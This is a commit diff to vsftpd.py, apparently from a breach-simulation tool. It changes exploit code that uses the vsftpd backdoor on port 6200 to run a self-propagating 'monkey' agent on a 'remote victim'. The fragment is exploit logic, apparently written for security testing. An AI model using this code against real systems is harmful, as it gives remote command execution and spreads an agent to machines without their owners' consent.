Update vsftpd.py

Changed the payload from /tmp/monkey to generating payload using build_monkey_commandline
This commit is contained in:
Dhayalan 2019-03-12 12:16:20 +01:00
parent 6313ce7933
commit 0b3e6274d9
1 changed files with 8 additions and 5 deletions

View File

@ -106,13 +106,16 @@ class VSFTPDExploiter(HostExploiter):
backdoor_socket.send(command)
#run the monkey
#run the monkey
cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1)
cmdline += "&"
LOG.info('[+] Connected to backdoor on %s:6200 to execute our command' , self.host.ip_addr)
command = str.encode("/tmp/monkey " + '\n')
command = str.encode(str(cmdline) + '\n')
backdoor_socket.send(command)
LOG.info("Successfully ran monkey on the next box \n")
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
self._config.dropper_target_path_linux, self.host, cmdline)
backdoor_socket.close()
self._exploit_info['Vulnerability'] = {"Success":"True"}